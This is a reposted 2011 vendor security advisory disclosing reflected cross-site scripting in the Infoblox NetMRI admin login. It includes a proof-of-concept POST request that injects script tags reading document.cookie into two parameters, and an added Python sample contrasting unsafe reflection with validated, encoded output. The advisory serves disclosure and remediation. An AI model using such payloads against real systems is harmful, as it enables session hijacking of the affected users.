securityvulns SECURITYVULNS:DOC:27337
Nov 21, 2011 - 12:00 a.m.

[FOREGROUND SECURITY 2011-004] Infoblox NetMRI 6.2.1 Multiple Cross-Site Scripting (XSS) vulnerabilities

============================================================
FOREGROUND SECURITY, SECURITY ADVISORY 2011-004

  • Original release date: November 10, 2011
  • Discovered by: Jose Carlos de Arriba - Senior Security Analyst at Foreground Security
  • Contact: (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com)
  • Severity: 4.3/10 (Base CVSS Score)
============================================================

I. VULNERABILITY

Multiple Cross-Site Scripting (XSS) vulnerabilities in Infoblox NetMRI 6.2.1 (latest version available when the vulnerability was discovered), 6.1.2 and 6.0.2.42 (prior versions have not been checked but could be vulnerable too).

II. BACKGROUND

Infoblox NetMRI is a network automation solution for configuration, optimization and compliance enforcement. With hundreds of built-in rules and industry best practices, it automates network change, intelligently manages device configurations and reduces the risk of human error.

III. DESCRIPTION

Infoblox NetMRI 6.2.1 (latest version available when the vulnerability was discovered), 6.1.2 and 6.0.2.42 contain multiple Cross-Site Scripting vulnerabilities in the "eulaAccepted" and "mode" parameters of the admin login page, caused by insufficient sanitization of user-supplied data and insufficient output encoding.
A malicious user could perform session hijacking or phishing attacks.
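
The root cause described above, shown as an added example that is not part of the original advisory or of NetMRI's code: a handler that reflects the two parameters verbatim, next to one that validates them and HTML-encodes on output. The hidden-field rendering and the allow-listed values are assumptions; the sample body is constructed from the request in section IV.

```python
from html import escape
from urllib.parse import parse_qs

# Form body modelled on the advisory's proof of concept (constructed sample).
SAMPLE_BODY = (
    "formStack=netmri/config/userAdmin/login"
    "&eulaAccepted=<script>alert(document.cookie)</script>"
    "&mode=<script>alert(document.cookie)</script>"
    "&weakPassword=false"
)

REFLECTED = ("eulaAccepted", "mode")  # parameters named in the advisory
# Assumption: the values the application legitimately expects are not
# documented in the advisory, so these allow-lists are hypothetical.
ALLOWED = {"eulaAccepted": {"true", "false"}, "mode": {"login", "logout"}}


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body to {name: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_unsafe(params):
    """Hypothetical model of the flaw: values go into the page verbatim."""
    return "".join(
        '<input type="hidden" name="%s" value="%s">' % (n, params.get(n, ""))
        for n in REFLECTED
    )


def render_safe(params):
    """Validate against the allow-list, then HTML-encode on output."""
    fields = []
    for name in REFLECTED:
        value = params.get(name, "")
        if value not in ALLOWED[name]:
            value = ""  # drop anything that is not an expected value
        fields.append(
            '<input type="hidden" name="%s" value="%s">'
            % (escape(name, quote=True), escape(value, quote=True))
        )
    return "".join(fields)


def encode_only(value):
    """Output encoding alone: markup and quotes become inert entities."""
    return escape(value, quote=True)
```

Validation and encoding are independent layers: the allow-list rejects unexpected values, and the encoding keeps any value that does get reflected from being parsed as markup.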

IV. PROOF OF CONCEPT

POST /netmri/config/userAdmin/login.tdf HTTP/1.1
Content-Length: 691
Cookie: XXXX
Host: netmrihost:443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.14322)

formStack=netmri/config/userAdmin/login&eulaAccepted=<script>alert(document.cookie)</script>&mode=<script>alert(document.cookie)</script>&skipjackPassword=ForegroundSecurity&skipjackUsername=ForegroundSecurity&weakPassword=false

V. BUSINESS IMPACT

An attacker could perform session hijacking or phishing attacks.

VI. SYSTEMS AFFECTED

Infoblox NetMRI 6.2.1 (latest), 6.1.2 and 6.0.2 branches (prior versions have not been checked but could be vulnerable too).

VII. SOLUTION

The vulnerability is fixed in version 6.2.2, available as of 10 Nov 2011.

Also the following security patches are available:

  • v6.2.1-NETMRI-8831
  • v6.1.2-NETMRI-8831
  • v6.0.2-NETMRI-8831

VIII. REFERENCES

http://www.infoblox.com/en/products/netmri.html
http://www.foregroundsecurity.com/
http://www.painsec.com

IX. CREDITS

This vulnerability was discovered by Jose Carlos de Arriba (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com).

X. REVISION HISTORY

  • November 10, 2011: Initial release.

XI. DISCLOSURE TIMELINE

August 28, 2011: Vulnerability discovered by Jose Carlos de Arriba.
August 28, 2011: Vendor contacted by email.
August 29: Vendor response asking for details.
September 21, 2011: Security advisory sent to vendor.
November 10, 2011: Security Fix released by vendor.
November 10, 2011: Security advisory released.

XII. LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.

Jose Carlos de Arriba, CISSP
Senior Security Analyst
Foreground Security
www.foregroundsecurity.com
jcarriba (at) foregroundsecurity (dot) com